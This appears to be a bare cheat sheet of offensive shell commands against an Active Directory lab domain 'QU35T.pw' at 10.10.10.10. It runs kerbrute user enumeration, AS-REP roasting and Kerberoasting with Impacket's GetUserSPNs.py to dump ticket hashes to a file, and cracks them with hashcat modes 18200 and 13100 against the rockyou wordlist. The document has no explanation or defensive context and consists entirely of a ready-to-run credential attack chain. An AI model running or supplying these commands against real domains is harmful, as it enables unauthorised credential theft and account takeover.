kerbrute userenum -d QU35T.pw --dc 10.10.10.10 users.txt
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt
GetUserSPNs.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password
GetUserSPNs.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password -request -outputfile tgs.hash
GetUserSPNs.py -usersfile users.txt -no-pass -dc-ip 10.10.10.10 qu35t.pw/
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt